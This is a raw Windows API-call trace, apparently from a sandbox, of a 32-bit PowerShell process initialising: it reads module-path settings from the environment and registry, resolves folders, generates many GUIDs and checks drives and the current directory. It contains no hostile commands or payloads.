pguid=0xdad6e0*(Data1=0xd7bf870b, Data2=0xd6ec, Data3=0x4906, Data4=([0]=0x83, [1]=0x54, [2]=0x8a, [3]=0x59, [4]=0x2b, [5]=0xdc, [6]=0x5a, [7]=0xb6))) returned 0x0 [0179.582] CoTaskMemAlloc (cb=0x20c) returned 0x31c8308 [0179.582] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x31c8308, nSize=0x104 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5d [0179.582] CoTaskMemFree (pv=0x31c8308) [0179.583] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0xdae53c, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e [0179.583] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae618 | out: phkResult=0xdae618*=0x438) returned 0x0 [0179.584] RegQueryValueExW (in: hKey=0x438, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdae634, lpData=0x0, lpcbData=0xdae630*=0x0 | out: lpType=0xdae634*=0x2, lpData=0x0, lpcbData=0xdae630*=0xbc) returned 0x0 [0179.584] RegQueryValueExW (in: hKey=0x438, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdae634, lpData=0x54027a4, lpcbData=0xdae630*=0xbc | out: lpType=0xdae634*=0x2, lpData="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpcbData=0xdae630*=0xbc) returned 0x0 [0179.584] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%", lpDst=0xdae498, nSize=0x64 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0179.584] ExpandEnvironmentStringsW (in: lpSrc="%\\WindowsPowerShell\\Modules;%", lpDst=0xdae498, nSize=0x64 | out: lpDst="%\\WindowsPowerShell\\Modules;%") returned 0x1e [0179.584] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0xdae498, nSize=0x64 | out: lpDst="C:\\WINDOWS") returned 0xb [0179.584] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0xdae498, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0179.585] RegCloseKey (hKey=0x438) returned 0x0 [0179.585] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0xdae53c, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0179.585] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae618 | out: phkResult=0xdae618*=0x438) returned 0x0 [0179.586] RegQueryValueExW (in: hKey=0x438, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdae634, lpData=0x0, lpcbData=0xdae630*=0x0 | out: lpType=0xdae634*=0x0, lpData=0x0, lpcbData=0xdae630*=0x0) returned 0x2 [0179.586] RegCloseKey (hKey=0x438) returned 0x0 [0179.586] CoTaskMemAlloc (cb=0x20c) returned 0x31c8308 [0179.586] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x31c8308 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0179.588] CoTaskMemFree (pv=0x31c8308) [0179.588] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0179.588] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0179.590] CoTaskMemAlloc (cb=0x20c) returned 0x31c8308 [0179.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31c8308, nSize=0x104 | out: lpBuffer="㏰̣夨ݦrogram Files (x86)") returned 0x0 [0179.590] CoTaskMemFree (pv=0x31c8308) [0179.591] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae5d8 | out: phkResult=0xdae5d8*=0x438) returned 0x0 [0179.592] RegQueryValueExW (in: hKey=0x438, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae5f8, lpData=0x0, lpcbData=0xdae5f4*=0x0 | out: lpType=0xdae5f8*=0x1, lpData=0x0, lpcbData=0xdae5f4*=0x56) returned 0x0 [0179.592] RegQueryValueExW (in: hKey=0x438, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdae5f8, lpData=0x54042e8, lpcbData=0xdae5f4*=0x56 | out: lpType=0xdae5f8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdae5f4*=0x56) returned 0x0 [0179.592] RegCloseKey (hKey=0x438) returned 0x0 [0179.592] ExpandEnvironmentStringsW (in: lpSrc="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpDst=0xdae520, nSize=0x64 | out: lpDst="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules") returned 0x33 [0179.593] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0179.595] GetProcAddress (hModule=0x772d0000, lpProcName="IsWow64Process") returned 0x772e5a20 [0179.595] GetCurrentProcess () returned 0xffffffff [0179.595] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0xdae674 | out: Wow64Process=0xdae674) returned 1 [0179.595] CoTaskMemAlloc (cb=0x20c) returned 0x31c8308 [0179.595] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x31c8308 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0179.598] CoTaskMemFree (pv=0x31c8308) [0179.598] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0179.598] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0179.598] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 1 [0179.705] CoTaskMemAlloc (cb=0x20c) returned 0x31c8308 [0179.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31c8308, nSize=0x104 | out: lpBuffer="㏰̣夨ݦsers\\FD1HVy\\Documents") returned 0x0 [0179.705] CoTaskMemFree (pv=0x31c8308) [0180.461] EtwEventRegister (in: ProviderId=0x541eb50, EnableCallback=0x5072d56, CallbackContext=0x0, RegHandle=0x541eb2c | out: RegHandle=0x541eb2c) returned 0x0 [0180.462] EtwEventSetInformation (RegHandle=0x75e8538, InformationClass=0x54, EventInformation=0x2, InformationLength=0x541eae0) returned 0x0 [0180.628] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdadf08 | out: phkResult=0xdadf08*=0x438) returned 0x0 [0180.631] RegQueryValueExW (in: hKey=0x438, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdadf28, lpData=0x0, lpcbData=0xdadf24*=0x0 | out: lpType=0xdadf28*=0x1, lpData=0x0, lpcbData=0xdadf24*=0x56) returned 0x0 [0180.631] RegQueryValueExW (in: hKey=0x438, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdadf28, lpData=0x542116c, lpcbData=0xdadf24*=0x56 | out: lpType=0xdadf28*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdadf24*=0x56) returned 0x0 [0180.631] RegCloseKey (hKey=0x438) returned 0x0 [0180.861] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x837e22d, Data2=0x7f6d, Data3=0x4e57, Data4=([0]=0x89, [1]=0x9d, [2]=0x28, [3]=0xb1, [4]=0xc, [5]=0xce, [6]=0xa7, [7]=0x94))) returned 0x0 [0180.862] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x7b9b3d83, Data2=0x96a6, Data3=0x4fa9, Data4=([0]=0xaf, [1]=0xbe, [2]=0xc0, [3]=0x52, [4]=0x4c, [5]=0x47, [6]=0x81, [7]=0x68))) returned 0x0 [0180.862] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x68c28f8, Data2=0x697c, Data3=0x436e, Data4=([0]=0x8e, [1]=0xfb, [2]=0xff, [3]=0x32, [4]=0xfe, [5]=0x7b, [6]=0x7e, [7]=0x3a))) returned 0x0 [0180.862] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x9da7454b, Data2=0xac24, Data3=0x49b2, Data4=([0]=0xab, [1]=0x3, [2]=0xef, [3]=0xf2, [4]=0x18, [5]=0x36, [6]=0x7c, [7]=0xc1))) returned 0x0 [0180.863] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x3fd23bf1, Data2=0x25cb, Data3=0x4d12, Data4=([0]=0x94, [1]=0x78, [2]=0x7e, [3]=0xc6, [4]=0x5a, [5]=0x68, [6]=0xd8, [7]=0xfa))) returned 0x0 [0180.863] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x5bc7a516, Data2=0x28d8, Data3=0x479d, Data4=([0]=0x95, [1]=0x33, [2]=0xf8, [3]=0x89, [4]=0x5a, [5]=0x63, [6]=0xd1, [7]=0xab))) returned 0x0 [0180.863] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xe6ec2eba, Data2=0x5208, Data3=0x48d6, Data4=([0]=0x93, [1]=0x18, [2]=0x86, [3]=0x39, [4]=0x26, [5]=0x66, [6]=0x6, [7]=0xfc))) returned 0x0 [0180.863] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x478a984a, Data2=0xef10, Data3=0x4937, Data4=([0]=0xbb, [1]=0xf2, [2]=0x2e, [3]=0xb4, [4]=0x90, [5]=0x22, [6]=0x8b, [7]=0x76))) returned 0x0 [0181.044] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xa4a9b4b2, Data2=0x742e, Data3=0x4299, Data4=([0]=0xb8, [1]=0xd9, [2]=0xf4, [3]=0x9d, [4]=0x56, [5]=0x4c, [6]=0xb0, [7]=0x10))) returned 0x0 [0181.044] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xee246be6, Data2=0x6c92, Data3=0x4bf9, Data4=([0]=0xbb, [1]=0x58, [2]=0xdf, [3]=0x42, [4]=0xd7, [5]=0x3a, [6]=0x11, [7]=0x52))) returned 0x0 [0181.044] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xaf30a71b, Data2=0x1a92, Data3=0x4b2b, Data4=([0]=0xbf, [1]=0x8d, [2]=0x3, [3]=0x18, [4]=0x6d, [5]=0xbd, [6]=0x2b, [7]=0xf0))) returned 0x0 [0181.045] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x2bedd3f7, Data2=0x7f54, Data3=0x4bee, Data4=([0]=0x96, [1]=0xc3, [2]=0xfd, [3]=0x45, [4]=0x2f, [5]=0x43, [6]=0x16, [7]=0x44))) returned 0x0 [0181.045] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x799cfcb7, Data2=0x5c72, Data3=0x4432, Data4=([0]=0x9d, [1]=0xb9, [2]=0x26, [3]=0xda, [4]=0x4f, [5]=0x5c, [6]=0x99, [7]=0x7a))) returned 0x0 [0181.045] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xfd711dfb, Data2=0x92c2, Data3=0x44a2, Data4=([0]=0xa9, [1]=0xe6, [2]=0x22, [3]=0x4a, [4]=0x94, [5]=0xa9, [6]=0x1f, [7]=0xa3))) returned 0x0 [0181.310] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x2522cd1c, Data2=0x674f, Data3=0x4661, Data4=([0]=0x96, [1]=0x36, [2]=0xef, [3]=0xde, [4]=0xb8, [5]=0xdd, [6]=0xa, [7]=0xea))) returned 0x0 [0181.311] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x7e67b8e, Data2=0x6eb5, Data3=0x4e40, Data4=([0]=0xab, [1]=0x16, [2]=0x69, [3]=0xf3, [4]=0x3d, [5]=0x39, [6]=0x64, [7]=0xe8))) returned 0x0 [0181.311] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x4e2cc922, Data2=0x629d, Data3=0x4c33, Data4=([0]=0x87, [1]=0xb4, [2]=0xfc, [3]=0xba, [4]=0x5, [5]=0x7c, [6]=0xd3, [7]=0x8f))) returned 0x0 [0181.311] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x4c11a3f4, Data2=0xbfad, Data3=0x4b52, Data4=([0]=0x83, [1]=0xfc, [2]=0x35, [3]=0x7d, [4]=0x65, [5]=0x94, [6]=0x14, [7]=0x2))) returned 0x0 [0181.315] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x423718e5, Data2=0x2b65, Data3=0x44a6, Data4=([0]=0xb7, [1]=0x89, [2]=0xff, [3]=0x7a, [4]=0xc8, [5]=0x5, [6]=0xd8, [7]=0x21))) returned 0x0 [0181.317] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x54d9827f, Data2=0xe607, Data3=0x42cf, Data4=([0]=0xad, [1]=0x57, [2]=0xd7, [3]=0x99, [4]=0x39, [5]=0x78, [6]=0xfe, [7]=0x23))) returned 0x0 [0181.317] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x1e56ca0d, Data2=0x60d1, Data3=0x4f30, Data4=([0]=0xb9, [1]=0xb, [2]=0xe9, [3]=0x94, [4]=0x0, [5]=0x9c, [6]=0x50, [7]=0x54))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x1777cb1c, Data2=0xb5f8, Data3=0x48fc, Data4=([0]=0xb7, [1]=0x4d, [2]=0x4b, [3]=0x89, [4]=0x5c, [5]=0x1, [6]=0xee, [7]=0x7d))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xeba5605d, Data2=0x2964, Data3=0x49db, Data4=([0]=0xbd, [1]=0x8f, [2]=0xd6, [3]=0xfe, [4]=0xbe, [5]=0x30, [6]=0xa9, [7]=0x54))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x770e155c, Data2=0xc55c, Data3=0x4bbb, Data4=([0]=0xbd, [1]=0x38, [2]=0x9e, [3]=0x51, [4]=0x38, [5]=0x2, [6]=0xe0, [7]=0xb3))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xdf3e5b5, Data2=0xa663, Data3=0x4e58, Data4=([0]=0x85, [1]=0x47, [2]=0xb1, [3]=0x35, [4]=0x85, [5]=0x89, [6]=0x65, [7]=0xa8))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x4a6f1db7, Data2=0xe0cd, Data3=0x490e, Data4=([0]=0x9b, [1]=0x3b, [2]=0xd7, [3]=0xe2, [4]=0x62, [5]=0xa, [6]=0x7b, [7]=0x43))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xe10749d7, Data2=0xf98a, Data3=0x4a09, Data4=([0]=0x88, [1]=0x6d, [2]=0x34, [3]=0xa5, [4]=0xa9, [5]=0xdb, [6]=0xfc, [7]=0x29))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xf116ca7b, Data2=0xf0e0, Data3=0x442a, Data4=([0]=0x9f, [1]=0xe8, [2]=0x8d, [3]=0xa, [4]=0x31, [5]=0xe2, [6]=0xcc, [7]=0x96))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xc60ba47f, Data2=0xd4d4, Data3=0x4706, Data4=([0]=0xb1, [1]=0x4c, [2]=0x10, [3]=0xa2, [4]=0xf1, [5]=0x28, [6]=0xb7, [7]=0xc4))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x95666906, Data2=0x748, Data3=0x4908, Data4=([0]=0xb3, [1]=0x37, [2]=0x4c, [3]=0xef, [4]=0x92, [5]=0x24, [6]=0xb9, [7]=0xd6))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x1fd1076f, Data2=0x387c, Data3=0x4a08, Data4=([0]=0x86, [1]=0x65, [2]=0x4e, [3]=0x90, [4]=0x34, [5]=0xda, [6]=0x29, [7]=0xd3))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x388e334d, Data2=0xa6ee, Data3=0x4883, Data4=([0]=0xad, [1]=0x53, [2]=0xc, [3]=0x5f, [4]=0x9c, [5]=0x8, [6]=0x25, [7]=0x2c))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x2967d63e, Data2=0x100b, Data3=0x41d0, Data4=([0]=0xa1, [1]=0x56, [2]=0xbf, [3]=0xb0, [4]=0xbb, [5]=0x79, [6]=0xec, [7]=0x63))) returned 0x0 [0181.318] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x4822493c, Data2=0x58b7, Data3=0x4297, Data4=([0]=0x80, [1]=0x87, [2]=0x33, [3]=0x82, [4]=0xab, [5]=0x83, [6]=0x3f, [7]=0xe4))) returned 0x0 [0181.332] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xc58b3984, Data2=0xf66c, Data3=0x458f, Data4=([0]=0xb1, [1]=0xcb, [2]=0xe5, [3]=0x56, [4]=0xb0, [5]=0xef, [6]=0xe1, [7]=0xe8))) returned 0x0 [0181.333] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x35a3059a, Data2=0x8ed6, Data3=0x49aa, Data4=([0]=0x87, [1]=0x5d, [2]=0x6c, [3]=0xd0, [4]=0xd0, [5]=0x16, [6]=0x48, [7]=0xa5))) returned 0x0 [0181.333] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xe002589, Data2=0xc0d7, Data3=0x4dfb, Data4=([0]=0x80, [1]=0x1b, [2]=0x33, [3]=0xbd, [4]=0x2f, [5]=0x79, [6]=0xc1, [7]=0xcd))) returned 0x0 [0182.937] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xdca3cbf6, Data2=0x41e2, Data3=0x449a, Data4=([0]=0x84, [1]=0xd6, [2]=0x10, [3]=0x5f, [4]=0x5a, [5]=0x13, [6]=0xf8, [7]=0x84))) returned 0x0 [0182.937] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xfd1b98dd, Data2=0xc926, Data3=0x4f11, Data4=([0]=0x89, [1]=0x32, [2]=0x65, [3]=0x9c, [4]=0x50, [5]=0x14, [6]=0xb8, [7]=0x45))) returned 0x0 [0182.938] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x65acb2d8, Data2=0x41b5, Data3=0x4832, Data4=([0]=0xa7, [1]=0x13, [2]=0xea, [3]=0x57, [4]=0x4e, [5]=0x88, [6]=0x70, [7]=0x94))) returned 0x0 [0182.938] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xce6239aa, Data2=0x9b2b, Data3=0x49f2, Data4=([0]=0x95, [1]=0xa1, [2]=0xd6, [3]=0xdd, [4]=0xa1, [5]=0x6d, [6]=0x8c, [7]=0x37))) returned 0x0 [0182.938] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xa5f2f8ed, Data2=0xd848, Data3=0x4673, Data4=([0]=0xa4, [1]=0xe0, [2]=0x5d, [3]=0xfd, [4]=0x1a, [5]=0x4c, [6]=0x4b, [7]=0x6f))) returned 0x0 [0182.938] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xb6f973e, Data2=0xcb96, Data3=0x4ffb, Data4=([0]=0x9a, [1]=0xb4, [2]=0x1f, [3]=0x1, [4]=0xc0, [5]=0xfa, [6]=0xb7, [7]=0xe9))) returned 0x0 [0182.938] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x235dc932, Data2=0x9ff, Data3=0x4d90, Data4=([0]=0x9a, [1]=0x94, [2]=0x82, [3]=0x5f, [4]=0xef, [5]=0xd7, [6]=0xcb, [7]=0x64))) returned 0x0 [0182.939] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xc0465771, Data2=0x831c, Data3=0x4acc, Data4=([0]=0xb3, [1]=0x48, [2]=0xde, [3]=0x3e, [4]=0x1f, [5]=0xcf, [6]=0x57, [7]=0xf0))) returned 0x0 [0182.940] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xd2e7d750, Data2=0x4f6b, Data3=0x4357, Data4=([0]=0xbb, [1]=0x6, [2]=0xa7, [3]=0xb4, [4]=0xb2, [5]=0x7c, [6]=0x17, [7]=0x7a))) returned 0x0 [0184.623] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x85ccfd1d, Data2=0x7317, Data3=0x4fa5, Data4=([0]=0x93, [1]=0xa9, [2]=0x84, [3]=0x82, [4]=0xbd, [5]=0xe3, [6]=0x50, [7]=0xf4))) returned 0x0 [0184.642] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xd31a1898, Data2=0x82d5, Data3=0x4f8c, Data4=([0]=0xae, [1]=0x0, [2]=0xad, [3]=0x7d, [4]=0x82, [5]=0x2a, [6]=0xb0, [7]=0x7c))) returned 0x0 [0184.642] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x847e6538, Data2=0x14fe, Data3=0x40d0, Data4=([0]=0x89, [1]=0x27, [2]=0x97, [3]=0x51, [4]=0xc6, [5]=0x7e, [6]=0x12, [7]=0x8b))) returned 0x0 [0184.642] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xb9fdfdba, Data2=0x25eb, Data3=0x46d1, Data4=([0]=0xb8, [1]=0x59, [2]=0x48, [3]=0xa5, [4]=0x52, [5]=0x6d, [6]=0xb2, [7]=0xf7))) returned 0x0 [0184.642] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xbcf50678, Data2=0x65ec, Data3=0x43aa, Data4=([0]=0xb9, [1]=0xa7, [2]=0xce, [3]=0xdd, [4]=0xea, [5]=0xf0, [6]=0x6e, [7]=0x41))) returned 0x0 [0184.642] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xe31bd47c, Data2=0x3004, Data3=0x4d82, Data4=([0]=0xad, [1]=0xeb, [2]=0xd7, [3]=0x2f, [4]=0x97, [5]=0xd5, [6]=0x78, [7]=0xe0))) returned 0x0 [0184.642] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xc3c78e94, Data2=0xea54, Data3=0x4a6e, Data4=([0]=0xb8, [1]=0xc, [2]=0x56, [3]=0x44, [4]=0x28, [5]=0x16, [6]=0xe3, [7]=0x23))) returned 0x0 [0184.642] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xcb206d2f, Data2=0xf679, Data3=0x422b, Data4=([0]=0xa5, [1]=0x67, [2]=0xef, [3]=0xac, [4]=0x1e, [5]=0x79, [6]=0xfc, [7]=0x28))) returned 0x0 [0184.642] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x6accf44c, Data2=0x5396, Data3=0x41cf, Data4=([0]=0xae, [1]=0xb4, [2]=0xf3, [3]=0xff, [4]=0x2d, [5]=0xfd, [6]=0x3d, [7]=0x4e))) returned 0x0 [0184.643] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x4de6079e, Data2=0x7773, Data3=0x4f5a, Data4=([0]=0x8d, [1]=0x47, [2]=0x49, [3]=0xa3, [4]=0xe6, [5]=0x5e, [6]=0xc2, [7]=0xcb))) returned 0x0 [0184.643] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x74563b87, Data2=0x628e, Data3=0x4772, Data4=([0]=0xba, [1]=0x7f, [2]=0xfc, [3]=0x68, [4]=0xcb, [5]=0x22, [6]=0x9a, [7]=0x1e))) returned 0x0 [0184.689] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0x8f207b54, Data2=0x2f42, Data3=0x4d3d, Data4=([0]=0x9c, [1]=0x43, [2]=0xbf, [3]=0xcd, [4]=0x15, [5]=0x14, [6]=0x6d, [7]=0x99))) returned 0x0 [0184.690] CoCreateGuid (in: pguid=0xdabdb4 | out: pguid=0xdabdb4*(Data1=0xb21554de, Data2=0x5acf, Data3=0x4c73, Data4=([0]=0xbc, [1]=0xd2, [2]=0x66, [3]=0x4f, [4]=0xa8, [5]=0x1e, [6]=0x5c, [7]=0x19))) returned 0x0 [0185.188] GetLogicalDrives () returned 0x4 [0185.188] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0185.188] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0185.504] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0185.504] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0185.504] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0185.508] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x323c478 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0186.018] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0186.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31fd1b0, nSize=0x104 | out: lpBuffer="༨ݡḘހ㊴畮㊤畮\x0e") returned 0x0 [0186.018] CoTaskMemFree (pv=0x31fd1b0) [0186.020] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0186.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31fd1b0, nSize=0x104 | out: lpBuffer="༨ݡḘހ㊴畮㊤畮\x0e") returned 0x0 [0186.020] CoTaskMemFree (pv=0x31fd1b0) [0186.020] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0186.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31fd1b0, nSize=0x104 | out: lpBuffer="༨ݡḘހ㊴畮㊤畮\x0e") returned 0x0 [0186.020] CoTaskMemFree (pv=0x31fd1b0) [0186.513] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0186.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31fd1b0, nSize=0x104 | out: 